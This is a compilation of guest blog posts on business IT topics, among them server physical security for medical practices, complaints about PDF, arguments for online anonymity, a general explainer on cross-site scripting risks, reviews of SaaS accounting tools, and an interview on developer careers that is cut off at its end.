  4. Operators need a much higher level of hand-holding and support as they do not have the internal staff and expertise to manage such systems. Connectiva Systems created tailored managed services offerings for Africa that allowed operators to successfully outsource all their operational analytics activities to the company.

Continued Mobile Growth

Growth is not without its challenges. To succeed, providers must understand the challenges of local operators and subscribers, working to meet their specific needs. But it’s an exciting time in Africa. The country is on its way to reach 100 percent mobile penetration within the next five years, and Connectiva plans to be part of it, every step of the way.

About the Author: Avi Basu is the CEO of Connectiva Systems. Headquartered in New York and with offices around the world, Connectiva has won numerous awards and has been consistently recognized as a thought leader in revenue management.

 

1 Africa Calling,” Zakir Gaibi, Andrew Maske, and Suraj Moraje, McKinsey & Company, August 2010

2 Lions on the move: The Progress and Potential of African Economies,” McKinsey Global Institute, June 2010

The Importance Of Physical Server Security For Privacy Protection (HIPAA, HITECH, PII, PHI)

The doctor insisted on knowing our physical security arrangements.  We explained that our servers run in a building designed for securing telecommunications equipment and staying online 24/7 with battery backup and powerful generators.  We shared that the building required electronic key cards to enter, security cameras monitoring who accessed the building and the cage required an actual key to unlock and enter. We closed by saying that all keys were under the control of our infrastructure coordinator and had to be checked out to leave his office.

At this point, we smiled and pointed to his server, and asked how his security compared to that.

The server sat under the reception counter ten feet from the front door.   Even more troubling; the admin password for the server was taped to the side of the box, as it seemed the server needed rebooting every few days and the doctor felt the IT professional was too expensive to bring out every time.  While this is an extreme example, it highlights a serious issue affecting the small healthcare business; how to physically safeguard data without spending huge sums of money.

HIPAA and HITECH both have compliance exemptions for small practices.  But, and this is an important but, those exemptions only protect covered entities as long as they follow “best practices”.  In this situation, the doctor likely could not fall back on the small practice exemption because no safeguard existed to protect the server.  Compromised data could result in penalties and public exposure costing the practice money and patients.  The small practice exemption is both a blessing and a curse: It can keep doctors from spending money with no real payback, but it means that the risk doesn’t go away if reasonable steps are not taken.

What can a small practice do to enhance physical security without spending a large sum of money? To begin, everyone must appreciate that the server itself is not the target; it is the sensitive information on the server someone wants.  Best practice for hosting an on-premise server means the office should not use a room in a high traffic area and limit server access to a select few.  It may require retrofitting an area in the back of the office to offer a secured area to house the server.  An electrician will likely have to reroute network cables to this new room and HVAC technicians may possibly need to put in a new cooling vent to keep the room at the proper temperature.  As you can see, costs begin to mount when physically securing the server becomes important.  Unfortunately, the small healthcare practice often overlooks server security when designing the office. What other alternatives exist?

The practice can evaluate the physical security strengths of renting its own space in a facility designed to run and protect computer equipment.  With this approach, the doctor has the benefit of sharing the facility cost with other businesses using the site, but now someone has to travel to the building to handle server issues that arise.  While physical security increases, so too does the cost of managing technical and administrative security.

The practice can also look at a complete off-premise solution to securely host their applications, store data, and provide secured access to users anywhere.  A service like this, whether vendor-based Software as a Service, or a virtual desktop like that delivered by Argentstratus, uses sophisticated security measures and then shares that cost with all users of the system. This approach reduces the cost of physical security to pennies an hour and frees the practice to use the space for treatment instead of storage and security.

Information security starts with making sure people cannot get easy access to the server.  This comes at a cost to the practice.  To house equipment on-premise requires giving up treatment rooms for server rooms.  To move off-premise will require the doctors to know and trust the service provider and insist on practice-centered Business Associate agreements, but in the end, the risk of data loss is real.  Knowing this and dealing with it early will allow the practice to adapt and create best practices that allow doctors to practice medicine, not IT.

About The Author: John Caughell is the Marketing Coordinator for Argentstratus. They are leading experts in the field of cloud technology for the medical industry. If you have any concerns about privacy and security for PII or PHI in the cloud, get in touch with them.

Graphic Design and Text – You’re Doing It Wrong (Stop Adobe Acrobat Abuse)

I have been reading a lot of commentary on “Human Computer Interaction” and “Information Design” recently. In the process, I discovered that the HCI community has come across an idea that is apparently not well known to information designers: defining the markup of a document to match the semantics (the semantic structure of the document) makes it easier, and more effective, to apply formatting to the document.

Well, duh!

How in the name of all that’s holy did this basic principle of document design ever fall out of your understanding?

Typographers and book designers were discussing this concept 100 years ago. I have books published 80 years ago that elaborate on the idea and its implementation in great detail.

Moving a little closer to home, Standard Generalized Markup Language (SGML) — the ancestor of HTML and XML — grew out of the understanding, by computer professionals working in the printing and publishing industry forty to fifty years ago, that:

Markup should encode the semantics of a document – formatting should be applied by assigning styles to the semantic elements

I suppose I should assign much of the blame for the loss of this insight on to Adobe.

When Adobe introduced Acrobat, my immediate reaction was utter hostility. You see, Acrobat was originally developed with a very simple, narrow focus: it was to be a way to transmit formatted documents from designers to printing companies in a completely faithful way. The printing company, using equipment and software from a wide variety of vendors, could process the received PDF document and be confident that the results would be exactly what the customer was expecting.

However, Adobe’s management saw that the page images displayed on their computer equipment were also quite faithful to the designer’s product, and probably decided that this was far more important than the readability of the resulting documents. Therefore, it seems that Adobe began marketing Acrobat as the best tool to produce documents to be read on computers.

This is a completely different purpose than faithfully transmitting documents to printers!

In the process, Adobe ignored a few minor details.

Document designers were (and to this day still are) designing their documents to be printed — typically on letter size (8.5 inch by 11 inch) or A4 size (210 millimeters by 297 millimeters) paper, oriented with the long side vertical (what we call “portrait mode”). Computer screens are almost always configured in a “landscape mode” — with the short side vertical. In addition, the resolution available on computer screens was vastly inferior to the resolution of a printed document (Twenty-five years later, that is still true, but less so). This led to some “interesting” results:

  • A document of simple format — with a single column of text spanning the width of the page — could not be read at all when the entire page width was displayed across the screen. The number of pixels available for each character was so small that normal text was completely illegible (character glyphs like “a” versus “e” versus “o”, or “n” versus “u”, were indistinguishable).
  • The same document, when enlarged sufficiently to make the text legible, required scrolling the view horizontally at least twice for each line of text (one or more times to advance to the next portion of the line, then an equal number of times to return to the beginning of the next line). This so completely interrupted the reading process as to make the document unintelligible.
  • A document of more complex format — for example, with two or more columns per page — could be readable “in detail”, but not “in bulk.” Again, the reader was forced to reverse the direction of vertical scrolling at the end of each column to return to the top of the page, and then to scroll horizontally to the next column; at the end of the last column on the page, the reader was forced to scroll horizontally (in the reverse direction) to get the first column of the next page.
  • In many cases, illustrations were illegible when the view was set to make text legible, and vice versa. The reader was forced to change scale, and adjust the position of the view, for each reference to an illustration.

Let’s contrast these disabilities with the experience of reading a properly formatted document in a Web browser, or other properly designed tool such as the various hypertext readers available when Acrobat was introduced:

  • Because document contents were encoded with structural markup, and formatting was encoded separately, the document delivery tools, consisting of the hardware and software, could apply some judgment to the rendering of the document. In particular, text could be flowed into the available display area, so that text in a legible size and font could be read as a continuous, connected stream (the only user interaction being to scroll continuously in a single direction).
  • The rendering system could also make appropriate decisions about rendering illustrations, so images could be presented at a scale that provide legibility and readability at the same time that the text was also presented legibly. The reader could absorb both text and illustrations without constantly changing the view.

Now that electronic books (E-books) have become popular, many people have experience with document rendering systems that work properly (that is, they render the document to fit the dimensions of the display, rather than attempting to fit an arbitrarily rendered document into a display of completely different configuration), and Acrobat is finally being seen for the impractical headache it has always been.

Yet, most “graphic designers” still don’t get it! Most designers still seem to think that their purpose is to make the document, or Web site, or whatever they are asked to present, “look good,” and that a pleasing design is more important than the contents.

One more time:

Information design is about delivering information. It’s not about making it look pretty, it’s about representing the structure to improve the communication.

I recommend to anybody who is, or who aspires to be, doing graphic design for a document or Web site to find a copy of The Crystal Goblet: Sixteen Essays on Typography by Beatrice Ward (my copy was published by The World Publishing Company in 1956). Ms. Ward wrote very clearly, and the title essay (which can also be found here, here, here, or here) expresses this key point very, very well.

There is plenty of room for a graphic designer to add value to a document or Web site, but he or she should achieve that goal by making the document do a better job of communicating the author’s message. When the graphic design becomes the primary function of a Web site, with the contents assigned some lesser role, it does a disservice to the reader (the consumer of the information), and an even bigger disservice to the writer (the publisher of the information). Yet virtually all Web sites, and far too many documents, are designed to achieve a “look and feel” first, and to communicate the information content second.

Using nothing more than HTML coding and cascading style sheets, it should be possible to construct Web pages that:

  • Take advantage of the full width of the window in which they are rendered (rather than limiting the display to some arbitrary number of pixels that serve as a lowest common denominator of acceptable displays)
  • Organize information by allotting space according to the amount of text (using tables with column widths defined as percentages of the page width)
  • Flow text around illustrations and other inserts (without imposing fixed positions on either the text or the insertions)
  • Represent the structure of the information by using paragraph styles (such as different heading levels, different kinds of lists, various kinds of emphasis, and the like), while allowing the instance of the set of Cascading Style Sheets (CSS) selected by the user, from among those appropriate for the rendering environment to define the specifics of fonts, sizes, justification, and so on.
  • In fact, encode Web pages that can be delivered on platforms as different as large, high-resolution desktop displays, even larger but comparatively low-resolution displays (such as living room television sets), and tiny mobile displays (such as smart phones) from a single source file, by changing only the CSS.

I am dedicating my efforts to educate the document publishing community (including Web designers) to this simple, but inexpressibly powerful concept: put the Information first, and the Appearance second.

About The Author: Michael Meyers-Jouan has extensive experience in the software development and graphic design industries. He is also a prolific contributor to IT Toolbox. You can reach him through his profile here.

21 Legitimate Arguments And Scenarios Where Online Anonymity is Required

In most developed nations, people (should ideally) have freedom of expression and the right to air their views without fear or favor. Since online communication is now the primary means of communication for many groups – with people using emails, social networking websites, web browsing, newsgroups, etc. to communicate – the freedom and protection of online speech and communications is increasingly becoming a major human rights issue.

Of course, online communications provides an easy, automated, inexpensive, nonviolent way for governments, companies and spies to track the activities of careless online users. That’s why it’s important to cover your footprints using the right tools. (proxy servers, Janus, Tor, VPNs, etc…)

Of course, people on the anti-privacy side of the argument will tell you “If you’re not doing anything wrong, you have nothing to hide”. However, that’s not how the world works.

Below, I’ve included 20 completely legitimate and legal scenarios in which online anonymity is critical.

  1. Online anonymity is an important tool in the prevention of online threats, malicious attacks, and identity thefts. When we browse the Internet, the search engines and ISPs automatically record our browsing. These logs are often either purposely sold to online marketers or hacked by online identity thieves, resulting in our personal data being exposed to unscrupulous elements. At times, we research sensitive information intentionally or unintentionally. In all the above circumstances, we require online anonymity.
  2. Journalists are increasingly required to communicate with prisoners or people under surveillance in countries – like China – that have repressive regimes. Unless the journalists and the persons whom they contact have the protection of anonymity, the contacted persons could face serious consequences from such repressive regimes. They need online anonymity to avoid retaliation and express the ground situation openly.
  3. With the recent high-profile security breaches from LulsSec, Anonymous and Wikileaks, it’s clear that we can’t trust governments and large organizations to protect our personally identifiable information.
  4. Law enforcement officers use online anonymity when investigating questionable or illegal websites, to conduct online undercover operations, and receive anonymous tips from informers about criminals or terrorists. In these situations, the law enforcement authorities and theiir contacts should have online anonymity for successful completion of investigation. If the suspects become aware of their being tracked, that could hamper the investigations.
  5. Military communications require maximum security. Today’s Internet hackers are so smart that they are sometimes even able to crack or decipher encrypted communications. And even with secure encryption, a lot of information can be obtained from just the packet headers. Hence, the commanders, officers, and field agents of military use anonymity. The threat posed by insurgents and terrorists has increased enormously in recent times. Military personnel require anonymous communications to protect themselves and their strategies from terrorist attacks. A recent example was the killing of Osama Bin Laden by a special force of the U.S. Military. All communications had been kept behind a veil.
  6. National intelligence agencies collect huge volumes of data on persons suspected of corruption, bribery, tax evasion, illegal activities, and exchange of information and documents of national interest. If the suspected people come to know of the surveillance by the intelligence agencies, they would easily take evasive action and escape prosecution. Hence, intelligence agencies usually resort to anonymous surveillance of such persons.
  7. Human rights activists and groups generally use online anonymity to escape unnecessary prosecution or harrassment, even though their activities are legitimate. In countries like China, any activism is severely suppressed brutally and hence most human rights activists in China resort to online anonymity to protect themselves.
  8. Labor unions have the right to organize workers into unions. Still, managements or governmental agencies are likely to disrupt their efforts. Under such circumstances, the labor unions and workers use online anonymity to organize and unite.
  9. Whistleblowers are another group that requires legitimate online anonymity. Whether they work for corporate business entities or governmental agencies, they could face personal harm and other repurcussions if their identity is known.
  10. Vulnerable businesses make anonymous communication channels available to help their employees inform the management about activities by their coworkers that could harm the business.
  11. Companies often monitor of the activities of their employees to identify those who view unwanted materials, job search sites on the Internet. Online anonymity is important for the protections of employee’s privacy and information access rights.
  12. Many bloggers use online anonymity to escape legal suits for what they express in their blogs.
  13. ISP network outages, DNS problems, and routing problems could lead to serious difficulties. Online anonymity tools could help in such circumstances.
  14. Several informers that provide vital data on sweatshops and illegal organizations also encounter danger to their lives. Such people use online anonymity to protect themselves.
  15. Lawyers with prestigious clientele could offend their clients if they express their political ideologies openly. Hence, they write on blogs anonymously, hiding their real identity.
  16. Social workers are forced to protect the poor citizens from unscrupulous elements that try to exploit them. In such situations, they require anonymity to achieve their goals and also have self-protection.
  17. Financial institutions participate in security clearing houses on a daily basis. They use online anonymity to safegaurd their data, since it is possible that the security of one financial institution could be breached, leading to overall compromise on data security.
  18. Several organizations protect their prices from competitors. If you wish to view the prices of your competitors, you might have to approach their website anonymously as general public.
  19. Investment bankers protect their investment decisions by operating anonymously and escaping from snoopers.
  20. Many online marketers use anonymity to conduct marketing operations so that their competitors are not alerted about their strategies.
  21. Since search engines modify their results based on a number of personally-identifed criteria such as location, web browsers, cookies, operating systems, etc…  online anonimty can help ensure that you get access to accurate, unfiltered web search results.

When The IT Department Gets In The Way Of Technology

I think IT workers make terrible gatekeepers, therefore it’s unwise to allow IT workers to dictate what technologies cannot be used within a company. Yet this is how traditional IT departments work within most companies: The IT workers specify what computers to buy for the staff, they issue cell phones and other portable devices based on perceived need, and decide what kinds of software everyone in the company must use for official work.

But with the personal portable device revolution firmly underway, we’re already seeing the fallout: Employees are buying their own technology, and they’re bringing it into work, expecting to use it. IT workers often want to tell employees to leave their Androids, iPhones, iPads and everything else at home. They must use only Blackberries at work for the IT staff to remain in control of the network, and the company’s information by extension, they might say.

But when the CEOs started showing up at work with these devices, the dynamic had to change. The suits didn’t care what the IT staff thought about their new toy’s security. They wanted to use it, and the responsibility went to the IT staff to make sure it’s done safely. Lots of IT managers grumbled, and I’ve read numerous reports of companies actually banning employees from bringing iPhones into the office.

But what’s to stop an attacker from bringing a banned device within range of your wireless network? Is your network still safe? Is it safe to assume that since you’ve banned a device from employee use, that it won’t mysteriously appear on the network anyway? It’s like burying your head in the sand and thinking that you’re never going to need sunscreen.

I’ve often espoused the idea that IT workers are performing a service on behalf of their coworkers. At their best, they are trusted advisors and troubleshooters, people who help their coworkers adopt new technologies, expanding the company’s capabilities, internal tech savvy and lateral decision-making capacity.

Ideally, IT workers would be advising employees on safe computing practices, strong passwords, reliable backups, remote wipe ability, etc. But more often, IT workers are too busy to do this, they’re instead waging a holy war against unapproved employee choices, obstructing how their colleagues use technology at work.

Vital aspects of security must be maintained, that goes without saying. But when IT acts like a petty tyrant, it doesn’t help the company, the employees, or ultimately the IT workers either. Usually there’s a way to incorporate new technologies without incurring massive new risks. Being capable and willing to do what’s necessary to make that possible should be a primary consideration when hiring a new IT worker.

About The Author: Troy Davis is CTO of CoupSmart, one a fast-growing coupon system that leverages the power of social media.

Make Your Users Aware of Cross-Site Scripting

Typical phishing attacks are fairly easy to catch. Antivirus companies are constantly on the lookout, and they have “honeypot” email accounts that exist solely to collect as much spam as possible.

When a phishing site is located, it is automatically blacklisted… usually within minutes. A red flag goes up and the signal ripples around the world within seconds. And when your users go to click the link, BANG! A big red warning, saying that this site has been blocked.

But hackers are wise to this game, and they’ve come up with new solutions. One such technique is through the use of something called “Cross-Site Scripting”. In essence, cross-site scripting occurs when a hacker is able to embed a piece of code into another web site. Take a look at the following video to see what I mean.

Yeah… he placed YouTube inside of another web site. So what’s the big deal?

Well, what if – instead of inserting a web page into this site, he inserted a fake login/password form? Since this is a legitimate web site, it would be difficult for antivirus companies to block the phishing attack without blocking out the entire legitimate web site?

And for an end-user landing on this page, it would be very difficult to tell the difference between the fake site and the real one, since they’re both hosted on the same domain.

These types of attacks are caused by lazy coding, and I predict that the current state of the economy will increase the frequency of these types of cross-site scripting attacks.

Companies looking to save money are outsourcing their custom coding to off-shore programming houses. And in order to charge the cheapest possible rates, these companies want to ship products out the door as quickly as possible. For this reason, form input is rarely checked… if at all.

I’ve personally had to deal with off-shore programmers on a number of projects, and found that security is very low on the priority list. When I come back with a bug list, they push back hard. In my experience, these companies are more interested in billing on a “per-project” rate than working on an hourly schedule.

And resistance also comes from within your own company. In order to maximize ROI, managers want to ship as early as possible, even if the final product isn’t 100% ready yet. For them, shipping on time can be a matter of personal reputation, and they’ll be ready to sacrifice a bit and risk a “It’ll never happen to me” scenario.

That’s why you need to have somebody you trust overlook all of the code when it’s shipped, and make sure that all user input is properly validated.

And there are other risks that come when users are able to enter whatever input they wish.

  • Some embedded code can pull cookie information when the administrator logs in, and this could be used to gain administrator access.
  • And in a worst-case scenario, a hacker could enter code that would run SQL commands on your database and take over your site.
  • Visiting a perfectly valid and trusted site could cause a malicious file download to come up.

And fixing your own code isn’t enough. The real problem with cross-site scripting is that it can come from any legitimate site on the internet. Even mega-sites like YouTube and Reddit aren’t immune to this type of hacking.

For this reason, you want to make your end-users aware that this type of code in other sites. Advise them to always type domains in manually, and never trust login links sent via email. And if they see funny activity on a web site – such as a popup – that they should contact IT to have it looked at.

No, Thanks, I won’t be Buying Any PDF eBooks or Downloading any PDF Whitepapers

You can find almost any information on-line these days. Of course, it’s a struggle searching the Internet for it, and most of it’s not particularly readable – and then you never know if it will be there in another week… So there’s still a market for “packaged” information. You know, what we used to call “books.”

I just wish that all of you who want to package information in electronic form would find a better format than the Adobe Portable Document Format (the infamous “PDF” or Acrobat file). I’ve suffered so much, with so many PDF files, and I just refuse to actually pay for such an awful medium.

I suppose I should explain my antipathy to the PDF file. The fundamental issue is that it solves the wrong problem.

You see, when Adobe first developed the Portable Document Format, their immediate goal was to provide a common format that could be used to transmit publications to commercial printers. This made it possible for graphic designers using “desktop publishing” tools to have complete control over the design and appearance  of printed documents, regardless of which applications they used to create the documents, and regardless of what typesetting or imaging equipment the commercial printer used. This was a wonderful idea, and PDF is an excellent tool for this purpose.

Unfortunately, the people at Adobe seem to have lost sight of the primary purpose of distributing documents — to communicate information. They began a campaign to make PDF the standard for the electronic distribution of documents. In doing so, they focused their marketing on the graphic design community, telling their customers that using PDF would enable them to create documents once, distribute them in any medium, and be able to ensure that all readers would “see the same design.”

That is, indeed, the result. When a document is made available electronically as a PDF file, the user is forced to deal with a document that was designed for a different medium, and that is in a terrible format for use in any electronic display.

To begin with, virtually all documents are being created to a standard page size, in a “portrait” orientation. This doesn’t work very well when virtually all electronic displays are in “landscape” format (except those in handheld computers — but I’ll get to that a little bit later).

Furthermore, when a document is designed for printing on a letter-sized page, it takes a pretty high resolution display to be able to render the entire width of the document legibly. I realize that’s not quite as serious as it was when Adobe first introduced Acrobat Reader (when an 800 by 600 display was still “high resolution”), but it can illustrate the overall problem very clearly: try setting your screen resolution lower (for example, to 640 by 480) and then try to read a letter-sized document in Acrobat Reader. In order to make the characters large enough to be legible, you have to zoom to a point where you can’t see the entire text line at once. Therefore, you have to scroll horizontally in both directions for every line of text you read!

Contrast this to the effect of opening a document in a “structured” format, such as SGML or HTML, in an appropriate reader (such as your Web browser). The reader formats the document, on the fly. The document is formatted to the screen. Therefore, the line breaks fit the available space, and you can read the document continuously. The document is formatted with text sizes that fit the display. Therefore, the text is legible (if your eyesight is limited, you can tell the reader to use larger sizes, and everything will be enlarged proportionately).

In particular, if you open the same document in two different readers, on two devices with very different characteristics, each reader will format the document to the available display. For example, use the Kindle Reader software on your desktop computer, and open an e-Book. Then open the same e-Book using Kindle Reader on a smart phone. You’ll be looking at very different line breaks, and very different page numbers, but in each case the document will be clearly legible and easily readable.

Adobe has done us all a great disservice by persuading so many people to use PDF as their format of choice.

About The Author: Michael Meyers-Jouan has extensive experience in the software development and graphic design industries. He is also a prolific contributor to IT Toolbox. You can reach him through his profile here.

Top 20 SaaS Accounting and Cloud Bookkeeping Online Software Reviews

When I was in college, I supported myself by starting my own small business on the side. I still remember collecting all of my receipts and business documents in a plastic bag, and then handing everything off to my bookkeeper at the end of the year.

That was so dumb. If anything happened to that bag, my business would’ve run into some serious problems.

But that’s no longer the case today.

Today’s businesses have access to a wide array of online, electronic bookkeeping applications which make this job so much easier. Especially within the past few years, we’ve seen a lot of important advancements in technology which have made bookkeeping easier.

  • Credit card transactions can be automatically added to the books.
  • You can use a camera phone to upload a receipt.
  • You can collaborate with business partners through a single application.

Bookkeeping is so much easier now than it’s ever been before. Even if you don’t understand accounting, you can still manage your own books.

Below, I’ve compiled a list of the top 20 online bookkeeping applications that are available from a Software-as-a-Service delivery model.

  1. Zoho Books - Zoho books is the ideal accounting software for small business. Zoho books is easy to use, and lets you share and collaborate effortlessly. And since it’s part of the Zoho suite, you know it’s a great system.
  2. Outright – The automated approach to bookkeeping. It lets you say goodbye to old-fashioned accounting.
  3. Kashoo – Kashoo helps you become more organized while also saving you money on accounting fees with their collaborative, tablet-friendly accounting software.
  4. Pavintheway – Manage your entire company from this full-featured robust online accounting package.
  5. Clear Books – Time-saving online bookkeeping software that’s in use at thousands of British companies.
  6. Accounts Portal – Manage your entire business from a single handy and easy-to-use accounting system.
  7. Yendo – With a Web 2.0 approach to finance, Yendo plays nicely with mobile devices and third-party cloud services.
  8. Xero – This is an incredibly easy accounting application that makes finance a pleasure.
  9. Netsuite – Good friends of the blog. This fast-growing company offers CRM, accounting, ERP and ecommerce software… all from a single source, and all from the cloud.
  10. NolaPro – Allows you to create your own online accounting site, or rent the hosted version directly from them.
  11. Merchant’s Mirror – This is the next step in the evolution of online small business accounting software.
  12. Envision Accounting –  An online accounting suite that’s specially designed for project-driven companies. Incorporates accounting and project management into a single suite.
  13. Quickbooks Online – QuickBooks is one of the best-known and most trusted brands in accounting. And this is their hosted online product offering.
  14. Wave Accounting – Easy to use with a high degree of automation. Get your accounting out of the shoebox, and into this simple, well-organized, secure solution.
  15. Skyclerk – Skyclerk offers dead simple accounting that’s elegant, reliable and secure.
  16. Perfect Books – Spend more time focusing on your business with the help of this free, paperless and automated online bookkeeping application.
  17. Financial Force – A cloud-based financial suite that’s affiliated with SalesForce and UNIT4.
  18. Freeagent Central – A stress-free online bookkeeping service that’s used every day by thousands of companies.
  19. Less Accounting – Less Accounting believes that accounting should be easy. Why do more accounting when you can do less accounting?
  20. Intacct – Award-winning accounting software that’s used by over four thousand organizations.

Do you see one that I missed? Would you like to share your experience with one of the companies I’ve mentioned? Leave a comment below and share your thoughts.

Are We Seeing The Death Of The Small Business Server?

The doctor is adamant.  She wants a managed service agreement with a maximum15 minute response time and a guarantee that her office will be up and running in under 30 minutes if the server goes down.  This seems unrealistic but, in a world where even the smallest business has a centralized server to host applications and store data, the inability to stay connected can cost business thousands in revenue.

She is not alone.  Decision-makers in every type of enterprise are beginning to worry about how they will work if their server goes down.  Even though hardware costs continue to drop, server set-up and management is becoming increasingly expensive.  IT professionals continue to offer technical solutions to the risk of downtime by increasing the number of disk drives, mirroring technology, swappable drives, remote monitoring software; but all this technology simply continues to push the cost of technology even higher.

These technological solutions, however, do not eliminate downtime.  To be fair, they reduce the risk of lost data in the event of catastrophe, but they do not keep the enterprise server online.  The only certain way to keep the hosted applications online and the data accessible is through complete redundancy.  But, if costs are already too high, hardware and software redundancy simply pushes the cost of complete accessibility out of reach.

This is the dilemma facing business decision-makers and computer manufacturers alike.  Centralized servers have become so essential to business that any amount of downtime puts the business at risk.  The IT dream solution is to increase the cost and complexity of on-premise systems to keep systems online.  The economic reality is that enterprises must find a way to have greater access without increasing their investment in IT infrastructure because they are already spending too much money on equipment they are not fully utilizing.

What are the options for business when equipment utilization is low, the cost high, and the equipment is essential to making money? The construction industry offers a potential solution. One company owns the expensive equipment and contractors pay for its use. High utilization reduces the ownership cost per hour.  Contractors no longer have to invest their capital and borrowing capacity in equipment; they can pay for it as they use it.

Creating “rent-like” qualities is one solution that gives enterprises access to their applications and data without the upfront equipment investment.  It requires one Company to own the expensive IT infrastructure and share it to keep utilization high.  To provide unlimited access, however, there has to be enough bandwidth, or the electronic means to move data and, the hardware and software must be infinitely expandable.  The industrialized world has invested heavily in creating broadband internet as well as new generation wireless connectivity.

The increase in high-speed connectivity has lead to higher demands for access to enterprise applications and data from places once unthinkable.  Today, all across America, sales professionals complete transactions in coffee shops and in airports.  This explosion of access to your enterprise applications and data has put more demands on your equipment, and placed your business information at risk.  If your business information is so sensitive, what steps are you taking to safeguard it?

In most instances, on-premise security is weak at best.  Server access is essentially uncontrolled and equipment does not have its own power and fire suppression systems.  There are limited technical means keeping data from incorrect storage on local drives.  There are no administrative requirements to create a complex password and change it regularly.  Let’s be honest: Security equals commitment and commitment equals dollars.  Small business just does not have the resources to commit to security.  Given their limited resources, decision-makers need to focus on ROI. Marketing and customers generate superior ROI; security systems do not.  Face it though; the demand for access will not go away.  This is the dilemma facing decision-makers today.

Securing your sensitive data requires a serious commitment. This commitment is best borne by groups of businesses with identical security needs and a willingness to share the cost of superior security solutions.  To steal a phrase, there is security in numbers and the need for security is what will kill the small server, not the other way around.

About The Author: John Caughell is the Marketing Coordinator for Argentstratus. Argentstratus provides secure hosted solutions for the medical industry. They are experts in the protection of PII and PHI.

Which Programming Language Is Best? (Important Career Advice For Programmers and Developers)

Are you having trouble converting social media leads into paying customers? CoupSmart is an incredibly clever tool that lets you use coupon marketing with the “Insider’s Club” that is your social media contact list.

In addition to being the current CTO of CoupSmart, Troy Davis is an experienced developer with a long list of successes behind him. Through his years in the software industry, he’s noticed some key career trends that separate successful developers from the ones who never reach their potential.

Troy has been nice enough to sit down with me and share some of his insights. Enjoy the interview below.

Can you please give me a bit of background about yourself and CoupSmart?

I started out as a webmaster for ad agencies in 1995, worked as the software developer and default IT manager for a few companies as my career progressed. One product I worked on got some investment money in 2008 and I’ve been working for startup companies as CTO since then. I’ve concentrated mostly on Web applications most of my career, but have also developed a few desktop and embedded apps as well. In 2001 I started a group called the Cincinnati Programmers Guild, an educational non-profit that focused on broadening the knowledge of its members by endorsing no specific technologies, which is much different from most technical groups. Instead, the focus was placed on learning new ideas no matter what technologies were used. We had consistent monthly meetings for 5 or 6 years, and it was a great experience.

CoupSmart started in 2009 by CEO Blake Shipley. Originally centered around an iPhone app, we shifted focus at the end of last year to try some interesting ideas we came up with regarding the economic, business and social dynamics of coupons. We’ve been offering a Web/Facebook promotions system for a couple of months now, it allows people to share offers with their friends to earn a higher value offer. Our customers are mostly in Cincinnati at the moment. We’re focused on tying social media to the physical world for our customers, and have recently developed a hardware device for point of sale to assist in this effort. This is in beta testing with a few customers at the moment.

What is your biggest beef with mindset of the software development community?

It’s not so much the community of software developers that present a problem, most people who make the effort to seek out and talk with other programmers are seeking knowledge themselves, and usually want to learn how others meet their challenges. This often leads to trying multiple languages, vendors, platforms, etc. and that’s all good.

The problem I’m discussing is more often seen in solitary developers. The technologies they use are initially attractive simply because the job ads show higher starting salaries for developers with experience in them. After some classes and much trial and error, the developer becomes minimally competent in a narrow aspect of software development, and lands a job by interviewing (often) with a non-technical HR person that can’t screen developers well.

After a few years, the developer achieves a certain level of proficiency with the tasks often assigned to them, and are assumed to be software development professionals. And they often coast for however long they can at this level.

Some time later, a new person takes over the department and doesn’t care for the technologies used by their predecessor. So a migration effort begins, and everyone is expected to adapt to the new technologies quickly or find some other kind of work for themselves. If a developer had taken an interest in keeping up to date with their field of work, they’d have recommendations for the new systems to contribute, and would likely find a comfortable place in the new structure. But those who rested on their laurels often respond defensively, obstructing change because they simply fear it. And ultimately they get pink slips.

When I was active with the Cincinnati Programmers Guild, I saw many mainframe developers who had been laid off in waves, and once unemployed were desperate to pick up that one key idea they needed to get another job doing the same thing they were doing for the last 15 or 20 years. Many of these people came to their first Guild meetings having only written COBOL or Fortran their entire careers. They’d never bothered to learn anything else. And most of them seemed to have the idea that learning just one new language was all that they needed to regain their previous role and stature.

Some got certifications in .Net or Java, spending thousands of dollars to reboot their careers. A few got new jobs and I never saw them at Guild meetings again, they reverted to their solitary existences I suppose. But most of them lingered in unemployment for years, taking this class or that class as they could afford it with temp jobs. Very few of them tried to go freelance, either. They all wanted back into large companies, it seemed. The illusion of job security was prevalent, despite the obvious evidence to the contrary, meaning all of the people with similar career conundrums attending the meetings.

If a developer has had success under a certain platform or language, what’s wrong with specializing and becoming an expert in that particular area?

There’s nothing wrong with becoming an expert in a particular area of study, it’s overspecialization that’s the problem: Focusing on one set of technologies to the exclusion of all others. So just because you happen to like writing C++ on Linux doesn’t mean you should pretend like it’s the only way to write decent software. You might fool a few people into believing you, but ultimately you’re just fooling yourself.

An example: A programmer I used to work with just absolutely hated Windows and everything that went with it. Just couldn’t stand to be in the same room with it. I worked on a Mac, so I was exempt somehow. But we had a web application that needed to be compatible with all the major browsers, and that was the plan. This developer fought with just about everyone on the staff to simply not support Internet Explorer, which would have been an almost certain an act of suicide for any SaaS company. I was in charge of this group, so it was my job to try to persuade her to just get the compatibility work done despite her qualms. It didn’t work out very well, several fits of yelling and rage happened both in person and over the phone. I urged to work with her as a freelancer only for a while to see if some isolation would help, but it didn’t, and ultimately she was laid off.

Another example: A Linux developer worked with me at the first ad agency I worked at in the late 90s. He was young and very opinionated about how great his chosen technologies were. He frequently insulted coworkers for their technical incompetence as he saw it, he was not popular with the staff. But he wrote code nobody else at the company knew how to write at the time, and it was important code, so his social eruptions were tolerated. I decided to learn more about Linux and C at that point, and within a couple of months had a pretty good understanding of what this guy was doing every day. And it wasn’t much. His claims of technical superiority had become a crutch, and he used others’ lack of knowledge to justify not working very hard at all. Ultimately he was let go after a particularly nasty exchange with a few coworkers. The next day he logged into a client’s server from his home and deleted their entire website, along with several log files that might have implicated him in doing so. But he missed one, and it had an IP address, which we confirmed later that day with his ISP to be assigned to his login at that time. We lost the client anyway, but he got special oversight by law enforcement authorities for years afterward. Might still be monitored, I’m not sure.

Many would argue that it’s a smart bet and a smart career move to align your efforts with the strongest or most dominant platform. What’s wrong with this mindset?

Nothing, so long as you understand that what you’re focusing on is just the current flavor of the month, and will inevitably be replaced with some other technology at some point. So just be prepared by learning about the alternatives before it’s time to switch.

My point is that programming is a career path where any valued proficiency has an expiration date attached, and as time goes on, that expiration period grows shorter. This is commensurate with how fast hardware is changing, the microprocessor industry has stayed pretty close to the predictions of Moore’s law for over 30 years now, and many academics say that this is evidence that we are still in the infancy of computing. It would be unwise to assume that we’ve reached any kind of sustainable plateau with these technologies yet.

